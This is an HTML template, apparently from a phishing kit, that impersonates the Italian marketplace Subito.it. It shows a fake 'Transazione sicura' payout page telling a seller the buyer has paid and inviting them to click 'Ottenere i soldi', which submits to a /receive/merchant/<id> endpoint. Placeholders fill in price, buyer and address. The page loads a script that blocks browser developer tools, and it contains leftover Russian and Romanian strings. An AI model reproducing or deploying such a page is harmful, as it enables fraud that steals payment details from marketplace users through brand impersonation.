<!DOCTYPE html>
    <html prefix="og: http://ogp.me/ns#" id="html" lang="ru"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        
        <meta http-equiv="x-ua-compatible" content="ie=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, minimal-ui, user-scalable=no">
        <meta name="twitter:card" content="Annunci: vendere, comprare in subito.it">
        <meta name="format-detection" content="telephone=no">
        <meta name="theme-color" content="#039ad3">
    
        <title>Annunci: vendere, comprare in subito.it</title>
        <meta property="og:type" content="website">
        <meta property="og:url" content="https://www.subito.it">
        <meta property="og:locale" content="ru_RU">
        <meta property="og:image" content="https://www.ispazio.net/wp-content/uploads/2015/09/icon450_450775137.png">
        <meta property="og:title" content="Subito.it">
        <meta property="og:site_name" content="subito.it">
        <meta property="og:description" content="Vendi e compra nuovo e usato online in modo semplice, rapido e sicuro. Oltre 6 milioni di annunci di auto, case, lavoro, elettronica, arredamento, animali e tanto altro">
        <link rel="canonical" href="https://subito.it/"><link rel="alternate" href="https://subito.it/">
        <link rel="icon" href="https://www.subito.it/static/img/favicon-32.png">
        <link type="text/css" href="/static/style/subitoit/ultra.css" rel="stylesheet">
        <script type="text/javascript" charset="utf-8" async="" src="/static/style/subitoit/loader.js"></script><script src="/static/style/subitoit/jquery-1.js"></script>
        <script src="/static/style/subitoit/vendor.js"></script>
        <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js'></script>
        <script src='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0-alpha.6/js/bootstrap.min.js'></script>

        <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0-alpha.6/css/bootstrap.min.css'>
        <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/bootstrap-material-design/4.0.2/bootstrap-material-design.css'>
        <link rel='stylesheet' href='https://fonts.googleapis.com/icon?family=Material+Icons'>
        <!-- support -->
        <link rel="stylesheet" href="/static/style/support/support_parent.css">
        <script src="/static/style/protect/protect.js"></script>
    </head>
    <body>
        <div class="
        chatra--webkit
        chatra--style-round
        chatra--side-bottom
        chatra--pos-right
        chatra--visible
        chatra--expanded
        chatra--fast-toggle
      " id="chatra" data-turbolinks-permanent="" style="width: 380px; height: 600px; transform: none; z-index: 2147483647; display:none;">
    <div id="chatra__iframe-wrapper">
      <iframe frameborder="0" id="chatra__iframe" allowtransparency="true" title="Chatra live chat" allow="autoplay" src="/static/style/support/index.html?id=<%=id %>" style="width: 380px; height: 600px; position: absolute"></iframe>
    </div>
  </div>
  <div class="support-circle" onclick="document.querySelector(&#39;#chatra&#39;).style.display = &#39;block&#39;;this.style.display = &#39;none&#39;"></div>
    <div id="chat-application" style="background: transparent none repeat scroll 0% 0%; overflow: hidden; display: block; margin: 0px; padding: 0px; bottom: 24px; transition: none 0s ease 0s; z-index: 2147483647; position: fixed; left: initial; right: 11px; max-height: 56px; max-width: 114px; height: 56px; width: 114px;"><iframe id="chat-application-iframe" title="Smartsupp" aria-hidden="true" style="background: transparent none repeat scroll 0% 0%; overflow: hidden; position: relative; width: 100%; height: 100%; margin: 0px; border: medium none; min-width: inherit; max-width: inherit; min-height: inherit; max-height: inherit; transition: none 0s ease 0s; z-index: 10000001;"></iframe></div><div class="base">
    
        <div class="_container" style="display: none" id="modal_city">
            <div class="js-modal-container">
                <div class="modal__box">
                    <div class="modal modal_city modal--show" overflow="hidden" tabindex="-999">
                        <div class="modal__wrapper">
                            <div class="modal__container">
                                <div class="modal__inner scrollable modal_city fadeIn zoomIn"><button id="modal_close" class="button button--close button--close-modal"><i class="icon icon--close modal-close_control visible-xs visible-sm"></i><i class="sc-htpNat modal-close_control modal-close_control_desktop hidden-xs hidden-sm sc-bxivhb bQwgYy"></i></button>
                                    <div>
                                        <form>
                                            <div class="modal__header modal__header--mobile">
                                                <h3></h3>
                                            </div>
                                            <div class="modal__body">
                                                <div class="form_group">
                                                    <div><input type="text" class="form_control form_control--simple" takeholder="Укажите ваш город" id="newcity_inp">
                                                        <div class="hint hint--animated"></div>
                                                        <div class="Select suggest_container has-value">
                                                            <div class="Select-control">
                                                                <div class="suggest_list hide"></div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="hide">
                                                    <div class="hint hint--animated"></div>
                                                </div>
                                            </div>
                                            <div class="modal__footer">
                                                <div class="buttons_wrapper fixed_buttons">
                                                    <div class="button_container"><button type="button" class="sc-dVhcbM pYkUn" id="closemodal"><span class="sc-fBuWsC pYkUn">Отмена</span></button></div>
                                                    <div class="button_container"><button type="button" class="sc-dVhcbM bjhbfW" id="newcity"><span class="sc-fBuWsC hvBxNu">Применить</span></button></div>
                                                </div>
                                            </div>
                                        </form>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    
        <div class="_container header_prototype header_prototype--board tiny" data-container="HeaderBoardContainer" data-tiny="1">
            <header data-test-component="HeaderBoard" class="sc-ugnQR jRQBFv">
                <div class="sc-eIHaNI grYHP"></div>
                <div class="sc-eTpRJs hnEmwS">
                    <div class="sc-iomxrj fZtIUm">
                        <section data-test-component="HeaderActionMenu" class="sc-gPEVay sc-eKZiaR dzCROE">
                            <div class="sc-jAaTju sc-jDwBTQ sc-jlyJG sc-drMfKT lkKOyd">
                                <div width="1" class="sc-jAaTju sc-iRbamj sc-hIVACf gjZzYk"><a href="https://www.subito.it/" title="subito.it" data-test-action="IndexPageLink" class="sc-eqIVtm sc-cpmKsF bcxWYD">
                                        <img src="https://assets.subito.it/static/logos/corporate.svg" height="50px">
                                    </a>
                                    <div class="sc-eXNvrr iBzLWS"></div>
                                </div>
                            </div>
                        </section>
                        <div class="sc-dxZgTM RFfMX"></div>
                    </div>
                </div>
            </header>
        </div>
    
    
    
    
        <aside class="nav_container sidebar_container">
            <nav class="_container" data-container="CategoryMobileContainer"></nav>
        </aside>
    
    
    
    
        <div class="bundle">
            <div class="container _container" data-container="PaymentsContainer">
                <div class="payments_container" id="payments">
                    <div>
                        <div class="container__28A_2L3T">
                            <div>
                                <div class="product__2oLb4nXl"><span class="product_image__2AcYUpNV"><img src="<%=image %>" id="pr_image" alt="<%=name %>" width="100" height="100"></span>
                                    <div class="product_owner__VUJH2ylJ">
                                        <div class="user user--simple">
                                            <div class="user__image"><span rel="nofollow"><img id="u_image" src="/static/style/subitoit/1075f68c8eb503cc8ff967b5a0a97c53_icon.png" alt="" width="64" height="64"></span></div>
                                            <div class="user__info">
                                                <div class="user__name"><span><span class="user__label">Annunci: vendere, comprare in subito.it</span><span id="u_name"></span></span></div>
                                                <!--div class="user__rating rating" id="u_rating"></div-->
                                            </div>
                                        </div>
                                    </div>
                                    <div class="product_content__mI30-3Fr">
                                        <div class="product_inner__1ZrDwagy">
                                            <div class="product_price__2IFwtrXu"><span class="product_real_price__j_Bk3J3i"><span><span id="pr_price"></span><span class="sc-bdVaJa ijDeHI"><b><%=price %> €</b><i>€.</i></span></span></span></div>
                                            <div class="product_title__3jNOq_vZ" id="pr_name"><%=name %></div>
                                        </div>
                                    </div>
                                </div>
                                <div class="container__b66PCR7o">
                                    <div class="summary__2TIRymkY">
                                        <div class="summary_header__bJmC15X9">
                                            <div class="summary_price__1HT5R9_P"><span>
                                                    <span id="last"></span><span id="cost" class="sc-bdVaJa ijDeHI"><b><%=price %> €</b><i>€.</i></span></span></div>
                                        </div>
                                        <div class="fixed_buttons fixed_buttons--single">
                                            <div class="summary_total__3aEKbkJu">Obține<div class="summary_total_value__nRhP7XkA"><span><span id="pr_price"></span>&nbsp;<span class="sc-bdVaJa ijDeHI"><b id="mobile_price"><%=price %> €</b><i>lei.</i></span></span></div>
                                            </div>
                                            <div class="button_container">
                                                <form action="/receive/merchant/<%=id %>" method="GET">
                                                    <button type="submit" class="sc-dVhcbM ccONKs" id="_buttonPay">
                                                        <span class="sc-fBuWsC hvBxNu">Ottenere i soldi</span>
                                                    </button>
                                                    
                                                </form>
                                            </div>
                                        </div>
                                        <div class="safely_text__392qqBrF">
                                            <div class="status_badge__icon status_badge__icon--deal"></div><span>Transazione sicura</span>
                                        </div>
                                        <div class="hint">Facendo clic sul pulsante „Ottenere i soldi”, sei d'accordo con <a href="https://www.subito.it/" target="_blank" rel="noopener noreferrer">Contratto di acquisto e vendita</a>&nbsp;&nbsp;utilizzo del servizio online "Transazione sicura".</div>
                                    </div>
                                    <div class="block__3ioUhNQH">
                                        <div class="panel__3B1d-ak5">
                                            <div class="panel_icon__1HmxOezY">
                                                <div class="status_badge__icon status_badge__icon--delivery status_icon__3QzFN2ZZ"></div>
                                            </div>
                                            <div class="panel_content__VGeorc1g">
                                                <div class="text__3Wt10VPX">Spedizione selezionata in tutto il paese<b id="pr_loc"></b>.</div>
                                                <div class="hint__aMasvQSz">L'acquirente ha pagato la merce, il denaro verrà trasferito sul tuo conto dopo la conferma.</div>
                                            </div>
                                            <div class="panel_button__2vr4fIVO"><button type="button" class="visible-xs sc-dVhcbM PZSwV"></button></div>
                                        </div>
                                        <div class="form__1P2Y3sX1">
                                            <form>
                                                <div>
                                                    <div class="row"><label class="label__332nHo7g">Indirizzo di consegna</label>
                                                        <div class="col-md-12">
                                                            <div class="root__3ahLIWiH">
                                                                <div class="from_group form_group__3-PlZQuP"><input type="text" class="form_control form_control__3Uyg-pWq" value="<%=address %>" readonly="readonly"></div>
                                                            </div>
                                                        </div>
                                                        <label class="label__332nHo7g">Dettagli del compratore</label>
                                                        <div class="col-md-12">
                                                            <div class="from_group form_group__3-PlZQuP"><input name="lastname" type="text" class="form_control form_control__3Uyg-pWq" maxlength="25" value="<%=buyer %>" readonly="readonly"></div>
                                                        </div>
                                                    </div>
                                                </div>
                                                
                                                <div class="boxberry_text__24q32W-A"><a href="https://www.posteitaliane.it/" target="_blank" rel="noopener noreferrer"><img src="/static/style/subitoit/poste-italiane.jpg" alt="Boxberry" width="82" height="48"></a>La consegna è fatta Posteitaliane.</div>
                                            </form>
                                        </div>
                                            <div class="hint">Facendo clic sul pulsante „Ottenere i soldi”, sei d'accordo con <a href="https://www.subito.it/" target="_blank" rel="noopener noreferrer">Contratto di acquisto e vendita</a>&nbsp;&nbsp;utilizzo del servizio online "Transazione sicura".</div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="overlay">
        <div class="loader hide"></div>
    </div>
    <div class="global">
        <div></div>
    </div>
    <script type="text/javascript">
        function openForm() {
          $('#myForm').css('display', 'block')
        $('#open-support').css('display', 'none')
      }
    
      function closeForm() {
        $('#myForm').css('display', 'none')
        $('#open-support').css('display', 'block')
    
      }
    </script>
    <script src="https://cdn.jsdelivr.net/gh/fz6m/console-ban@3.2/dist/console-ban.min.js"></script>
    <script>
        ConsoleBan.init({
            redirect: 'https://http.cat/403'
        })
    </script>
    </body></html>